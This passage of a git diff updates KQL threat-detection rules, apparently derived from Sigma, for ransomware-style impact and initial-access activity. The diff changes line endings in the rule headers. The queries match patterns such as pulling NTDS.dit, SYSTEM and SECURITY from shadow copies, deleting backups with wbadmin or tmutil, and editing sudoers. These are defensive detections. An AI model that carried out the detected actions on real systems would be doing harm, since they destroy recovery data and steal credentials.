-// - Legitimate usage of SDelete
-// - Files that are interacted with that have these extensions legitimately
-
-DeviceRegistryEvents
+// Title: Potential Secure Deletion with SDelete
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: medium
+// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195
+// False Positives:
+// - Legitimate usage of SDelete
+// - Files that are interacted with that have these extensions legitimately
+
+DeviceRegistryEvents
 | where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ"
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
index 2adfd108..8a42af26 100644
--- a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
+++ b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious Change To Sensitive/Critical Files
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2023-05-30
-// Level: medium
-// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1565.001
-// False Positives:
-// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
-
-DeviceProcessEvents
+// Title: Potential Suspicious Change To Sensitive/Critical Files
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2023-05-30
+// Level: medium
+// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron."
or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/")
\ No newline at end of file
diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/Impact/registry_disable_system_restore.kql
index 1dfead8f..52c1a66f 100644
--- a/KQL/rules/Impact/registry_disable_system_restore.kql
+++ b/KQL/rules/Impact/registry_disable_system_restore.kql
@@ -1,10 +1,10 @@
-// Title: Registry Disable System Restore
-// Author: frack113
-// Date: 2022-04-04
-// Level: high
-// Description: Detects the modification of the registry to disable a system restore on the computer
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-
-DeviceRegistryEvents
+// Title: Registry Disable System Restore
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to disable a system restore on the computer
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/Impact/renamed_gpg_exe_execution.kql
index eb49ba18..86a7d55a 100644
--- a/KQL/rules/Impact/renamed_gpg_exe_execution.kql
+++ b/KQL/rules/Impact/renamed_gpg_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Gpg.EXE Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023-08-09
-// Level: high
-// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486
-
-DeviceProcessEvents
+// Title: Renamed Gpg.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-08-09
+// Level: high
+// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
index 8ca5bce7..60d1182a 100644
--- a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
+++ b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql
@@ -1,12 +1,12 @@
-// Title: Renamed Sysinternals Sdelete Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-09-06
-// Level: high
-// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1485
-// False Positives:
-// - System administrator usage
-
-DeviceProcessEvents
+// Title: Renamed Sysinternals Sdelete Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+// False Positives:
+// - System administrator usage
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
index 44266cf4..fdfbdb41 100644
--- a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
+++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql
@@ -1,12 +1,12 @@
-// Title: Sensitive File Access Via Volume Shadow Copy Backup
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021-08-09
-// Level: high
-// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Sensitive File Access Via Volume Shadow Copy Backup
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql
index a7dabeb3..32097d2e 100644
--- a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql
+++ b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Stop Windows Service Via Net.EXE
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "net" utility.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-// False Positives:
-// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
-
-DeviceProcessEvents
+// Title: Stop Windows Service Via Net.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "net" utility.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql
index 452acd52..18221c55 100644
--- a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql
+++ b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql
@@ -1,12 +1,12 @@
-// Title: Stop Windows Service Via PowerShell Stop-Service
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-05
-// Level: low
-// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-// False Positives:
-// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
-
-DeviceProcessEvents
+// Title: Stop Windows Service Via PowerShell Stop-Service
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql
index 14fd63aa..5f3b4964 100644
--- a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql
+++ b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql
@@ -1,12 +1,12 @@
-// Title: Stop Windows Service Via Sc.EXE
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "sc.exe" utility
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1489
-// False Positives:
-// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly
-
-DeviceProcessEvents
+// Title: Stop Windows Service Via Sc.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "sc.exe" utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
index 86e85510..87cf389b 100644
--- a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
+++ b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Creation TXT File in User Desktop
-// Author: frack113
-// Date: 2021-12-26
-// Level: high
-// Description: Ransomware create txt file in the user Desktop
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486
-
-DeviceFileEvents
+// Title: Suspicious Creation TXT File in User Desktop
+// Author: frack113
+// Date: 2021-12-26
+// Level: high
+// Description: Ransomware create txt file in the user Desktop
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql
index 667bed26..20ce224e 100644
--- a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql
+++ b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of Shutdown
-// Author: frack113
-// Date: 2022-01-01
-// Level: medium
-// Description: Use of the commandline to shutdown or reboot windows
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1529
-
-DeviceProcessEvents
+// Title: Suspicious Execution of Shutdown
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Use of the commandline to shutdown or reboot windows
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
index 86c8dbc8..95afeb96 100644
--- a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
+++ b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of Shutdown to Log Out
-// Author: frack113
-// Date: 2022-10-01
-// Level: medium
-// Description: Detects the rare use of the command line tool shutdown to logoff a user
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1529
-
-DeviceProcessEvents
+// Title: Suspicious Execution of Shutdown to Log Out
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detects the rare use of the command line tool shutdown to logoff a user
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql
index df36ed47..906b300c 100644
--- a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql
+++ b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious MacOS Firmware Activity
-// Author: Austin Songer @austinsonger
-// Date: 2021-09-30
-// Level: medium
-// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
-// MITRE Tactic: Impact
-// Tags: attack.impact
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Suspicious MacOS Firmware Activity
+// Author: Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
+// MITRE Tactic: Impact
+// Tags: attack.impact
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd"
\ No newline at end of file
diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql
index 655c225c..56d1c284 100644
--- a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql
+++ b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Reg Add BitLocker
-// Author: frack113
-// Date: 2021-11-15
-// Level: high
-// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Reg Add BitLocker
+// Author: frack113
+// Date: 2021-11-15
+// Level: high
+// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/Impact/system_shutdown_reboot_macos.kql
index fdd299b4..039fdd94 100644
--- a/KQL/rules/Impact/system_shutdown_reboot_macos.kql
+++ b/KQL/rules/Impact/system_shutdown_reboot_macos.kql
@@ -1,12 +1,12 @@
-// Title: System Shutdown/Reboot - MacOs
-// Author: Igor Fits, Mikhail Larin, oscd.community
-// Date: 2020-10-19
-// Level: informational
-// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1529
-// False Positives:
-// - Legitimate administrative activity
-
-DeviceProcessEvents
+// Title: System Shutdown/Reboot - MacOs
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
 | where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt"
\ No newline at end of file
diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
index 2fb186f4..a309ed3b 100644
--- a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
+++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql
@@ -1,13 +1,13 @@
-// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
-// Author: Pratinav Chandra
-// Date: 2024-05-29
-// Level: medium
-// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
-// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil".
+// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
index f8be93e0..3e5197f8 100644
--- a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
+++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql
@@ -1,13 +1,13 @@
-// Title: Time Machine Backup Disabled Via Tmutil - MacOS
-// Author: Pratinav Chandra
-// Date: 2024-05-29
-// Level: medium
-// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
-// An attacker can use this to prevent backups from occurring.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate administrator activity
-
-DeviceProcessEvents
+// Title: Time Machine Backup Disabled Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
+// An attacker can use this to prevent backups from occurring.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
index 42e6194f..cafb5b95 100644
--- a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
+++ b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql
@@ -1,12 +1,12 @@
-// Title: User Has Been Deleted Via Userdel
-// Author: Tuan Le (NCSGroup)
-// Date: 2022-12-26
-// Level: medium
-// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1531
-// False Positives:
-// - Legitimate administrator activities
-
-DeviceProcessEvents
+// Title: User Has Been Deleted Via Userdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/userdel"
\ No newline at end of file
diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
index b3b81cb3..6c7054e3 100644
--- a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
+++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
@@ -1,14 +1,14 @@
-// Title: Windows Backup Deleted Via Wbadmin.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-13
-// Level: medium
-// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
-// This technique is used by numerous ransomware families and actors.
-// This may only be successful on server platforms that have Windows Backup enabled.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate backup activity from administration scripts and software.
-
-DeviceProcessEvents
+// Title: Windows Backup Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: medium
+// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate backup activity from administration scripts and software.
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
index 613dd7ff..b6d8a09b 100644
--- a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
+++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
@@ -1,14 +1,14 @@
-// Title: Windows Recovery Environment Disabled Via Reagentc
-// Author: Daniel Koifman (KoifSec), Michael Vilshin
-// Date: 2025-07-31
-// Level: medium
-// Description: Detects attempts to disable windows recovery environment using Reagentc.
-// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
-// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate administrative activity
-
-DeviceProcessEvents
+// Title: Windows Recovery Environment Disabled Via Reagentc
+// Author: Daniel Koifman (KoifSec), Michael Vilshin
+// Date: 2025-07-31
+// Level: medium
+// Description: Detects attempts to disable windows recovery environment using Reagentc.
+// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
+// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
index 9ede513f..1632ad0c 100644
--- a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
+++ b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql
@@ -1,12 +1,12 @@
-// Title: Disk Image Mounting Via Hdiutil - MacOS
-// Author: Omar Khaled (@beacon_exe)
-// Date: 2024-08-10
-// Level: medium
-// Description: Detects the execution of the hdiutil utility in order to mount disk images.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001
-// False Positives:
-// - Legitimate usage of hdiutil by administrators and users.
-
-DeviceProcessEvents
+// Title: Disk Image Mounting Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to mount disk images.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001
+// False Positives:
+// - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
index 383905ac..c875e914 100644
--- a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
+++ b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
@@ -1,12 +1,12 @@
-// Title: ISO File Created Within Temp Folders
-// Author: @sam0x90
-// Date: 2022-07-30
-// Level: high
-// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-// False Positives:
-// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file
-
-DeviceFileEvents
+// Title: ISO File Created Within Temp Folders
+// Author: @sam0x90
+// Date: 2022-07-30
+// Level: high
+// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file
+
+DeviceFileEvents
 | where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
index 068f7377..d2a1fb30 100644
--- a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
+++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
@@ -1,13 +1,13 @@
-// Title: ISO or Image Mount Indicator in Recent Files
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-11
-// Level: medium
-// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
-// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-// False Positives:
